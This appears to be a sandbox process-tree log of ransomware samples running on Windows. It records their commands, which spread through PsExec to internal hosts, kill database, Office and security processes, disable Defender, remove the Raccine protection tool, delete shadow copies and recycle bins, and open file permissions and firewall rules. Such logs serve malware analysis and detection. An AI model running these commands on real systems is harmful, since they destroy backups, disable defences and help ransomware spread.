    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.16 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5228
- - C:\Windows\TEMP\uwtg55hs.exe
    "C:\Windows\TEMP\uwtg55hs.exe" \\10.10.0.30 -d -h -s -f -accepteula -nobanner -c "C:\Windows\2033194ab3c2602eb9d3b31eeb5432514c423eac213f1219e5865dfee371ed58.bin.sample.exe"
    3⤵
    PID:5760
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\D$
    3⤵
    PID:6976
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:424
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\E$
    3⤵
    PID:3408
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\L$
    3⤵
    PID:4132
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\M$
    3⤵
    PID:256
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\F$
    3⤵
    PID:5528
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:6212
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\N$
    3⤵
    PID:3820
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\G$
    3⤵
    PID:4820
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\O$
    3⤵
    PID:6000
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:4572
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\H$
    3⤵
    PID:5356
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\P$
    3⤵
    PID:6952
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\I$
    3⤵
    PID:5968
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Q$
    3⤵
    PID:1044
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\R$
    3⤵
    PID:6536
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\J$
    3⤵
    PID:6112
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:6940
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\K$
    3⤵
    PID:3044
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\S$
    3⤵
    PID:2604
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:1176
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\L$
    3⤵
    PID:5096
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\T$
    3⤵
    PID:6476
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\M$
    3⤵
    PID:4972
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\U$
    3⤵
    PID:4520
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    PID:1172
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\N$
    3⤵
    PID:1524
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\V$
    3⤵
    PID:404
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\O$
    3⤵
    PID:5056
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    - Kills process with taskkill
    PID:7164
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\W$
    3⤵
    PID:252
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\P$
    3⤵
    PID:6608
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\X$
    3⤵
    PID:2692
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Q$
    3⤵
    PID:1692
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Y$
    3⤵
    PID:4168
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    PID:6132
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\R$
    3⤵
    PID:5744
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\S$
    3⤵
    PID:6516
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Z$
    3⤵
    PID:4396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    PID:4156
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\T$
    3⤵
    PID:5140
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\U$
    3⤵
    PID:4100
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:5508
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\V$
    3⤵
    PID:4296
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\W$
    3⤵
    PID:5808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:5624
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\X$
    3⤵
    PID:7148
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Y$
    3⤵
    PID:1408
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:5332
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.10\Z$
    3⤵
    PID:6700
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.11\Users
    3⤵
    PID:4712
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:6628
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    - Kills process with taskkill
    PID:6968
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    - Kills process with taskkill
    PID:6124
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    - Kills process with taskkill
    PID:4532
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:4224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:1716
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:1744
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:5284
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:4824
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:1680
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:6224
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:6184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:5376
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    - Kills process with taskkill
    PID:5396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:4808
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:6904
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    PID:6484
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:6060
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    PID:6456
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:6064
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    PID:6908
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    - Kills process with taskkill
    PID:5544
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4304
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:1288
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.15\Users
    3⤵
    PID:6264
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:4480
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6496
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:7144
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:6924
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:4388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:6952
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:5968
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.18\Users
    3⤵
    PID:7100
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:2388
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:6428
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.21\Users
    3⤵
    PID:4196
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.24\Users
    3⤵
    PID:2104
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.27\Users
    3⤵
    PID:4560
- - C:\Windows\system32\net.exe
    "net.exe" use \\10.10.0.30\Users
    3⤵
    PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Dnscache /y
1⤵
PID:4236
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop macmnsvc /y
  2⤵
  PID:3484

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop bedbg /y
1⤵
PID:5484

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:4844

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:5448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:5808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:6504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:4668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:4580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:4436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:1328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:4212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:4328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:6216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:4468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:5044

C:\Windows\PAExec-4840-RJMQBVDN.exe
C:\Windows\PAExec-4840-RJMQBVDN.exe -service
1⤵
PID:5668
- C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
  "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
  2⤵
  PID:764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
    3⤵
    PID:4236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    PID:2684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    PID:1328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    PID:1376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    PID:4136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    PID:832
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    PID:4668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:5300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    PID:4520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    PID:5508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:6136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:6152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    PID:5720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:5152
- - C:\Windows\system32\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    PID:3184
- - C:\Windows\system32\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:7024
- - C:\Windows\system32\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:5268
- - C:\Windows\system32\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:7116
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:6832
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:6204
- - C:\Windows\system32\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:1292
- - C:\Windows\system32\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:6324
- - C:\Windows\system32\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:6064
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4960
- - C:\Windows\system32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:5428
- - C:\Windows\system32\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:6096
- - C:\Windows\system32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:5504
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:924
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:2948
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:1152
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:6080
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    - Kills process with taskkill
    PID:5312
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:5128
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:6184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    PID:3820
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:6976
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    PID:2696
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    PID:7132
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:4864
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    PID:4552
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:4120
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    PID:4492
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:2948
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlwriter.exe /F
    3⤵
    PID:4548
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM outlook.exe /F
    3⤵
    - Kills process with taskkill
    PID:2208
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocomm.exe /F
    3⤵
    PID:1172
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:7056
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:6804
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tbirdconfig.exe /F
    3⤵
    - Kills process with taskkill
    PID:7136
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM tmlisten.exe /F
    3⤵
    - Kills process with taskkill
    PID:6464
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:4396
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM infopath.exe /F
    3⤵
    - Kills process with taskkill
    PID:5608
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM visio.exe /F
    3⤵
    PID:4176
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM excel.exe /F
    3⤵
    - Kills process with taskkill
    PID:5524
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbeng50.exe /F
    3⤵
    - Kills process with taskkill
    PID:5636
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM msftesql.exe /F
    3⤵
    - Kills process with taskkill
    PID:3312
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" IM thunderbird.exe /F
    3⤵
    PID:4228
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mbamtray.exe /F
    3⤵
    PID:5972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM dbsnmp.exe /F
    3⤵
    PID:4596
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:4960
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM CNTAoSMgr.exe /F
    3⤵
    - Kills process with taskkill
    PID:6752
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM thebat64.exe /F
    3⤵
    - Kills process with taskkill
    PID:6084
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM powerpnt.exe /F
    3⤵
    PID:2340
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM zoolz.exe /F
    3⤵
    PID:4388
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM xfssvccon.exe /F
    3⤵
    PID:5212
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM winword.exe /F
    3⤵
    - Kills process with taskkill
    PID:6784
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-nt.exe /F
    3⤵
    - Kills process with taskkill
    PID:1832
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlservr.exe /F
    3⤵
    - Kills process with taskkill
    PID:6816
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM wordpad.exe /F
    3⤵
    PID:4884
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:1044
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld-opt.exe /F
    3⤵
    PID:4464
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocautoupds.exe /F
    3⤵
    PID:7088
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ocssd.exe /F
    3⤵
    - Kills process with taskkill
    PID:4820
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /F
    3⤵
    PID:6760
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlagent.exe /F
    3⤵
    PID:5744
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqlbrowser.exe /F
    3⤵
    - Kills process with taskkill
    PID:4972
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sqld.exe /f
    3⤵
    - Kills process with taskkill
    PID:6832
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysql.exe /f
    3⤵
    PID:184
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rphost.exe /f
    3⤵
    PID:6944
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM rmngr.exe /f
    3⤵
    - Kills process with taskkill
    PID:4552
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM ragent.exe /f
    3⤵
    - Kills process with taskkill
    PID:4492
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /f
    3⤵
    PID:6884
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM oracle.exe /f
    3⤵
    PID:5512
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM 1cv8.exe /f
    3⤵
    PID:7028
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM vmwp.exe /f
    3⤵
    PID:6312
- - C:\Windows\system32\taskkill.exe
    "taskkill.exe" /IM sql.exe /f
    3⤵
    - Kills process with taskkill
    PID:2544
- - C:\Windows\system32\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:4716
- - C:\Windows\system32\icacls.exe
    "icacls" "D:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:812
- - C:\Windows\system32\icacls.exe
    "icacls" "C:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:3040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
    3⤵
    PID:6220

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
PID:4328
- C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
  "714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
  2⤵
  PID:5380
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    PID:6084
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:6120
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:6400
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:628
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:4556
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:6812
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:5164
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:3920
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4132
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:4960
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:6060
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:5760
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM synctime.exe /F
    3⤵
    PID:6940
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    PID:6996
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:760
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:5660
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:6736
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM Ntrtscan.exe /F
    3⤵
    PID:4436
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM isqlplussvc.exe /F
    3⤵
    - Kills process with taskkill
    PID:4848
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM sqbcoreservice.exe /F
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM agntsvc.exe /F
    3⤵
    PID:5404
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM PccNTMon.exe /F
    3⤵
    - Kills process with taskkill
    PID:6644
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mysqld.exe /F
    3⤵
    - Kills process with taskkill
    PID:6276
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM onenote.exe /F
    3⤵
    - Kills process with taskkill
    PID:6536
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM firefoxconfig.exe /F
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM steam.exe /F
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM thebat.exe /F
    3⤵
    PID:6036
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM msaccess.exe /F
    3⤵
    - Kills process with taskkill
    PID:6796
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM encsvc.exe /F
    3⤵
    PID:6076
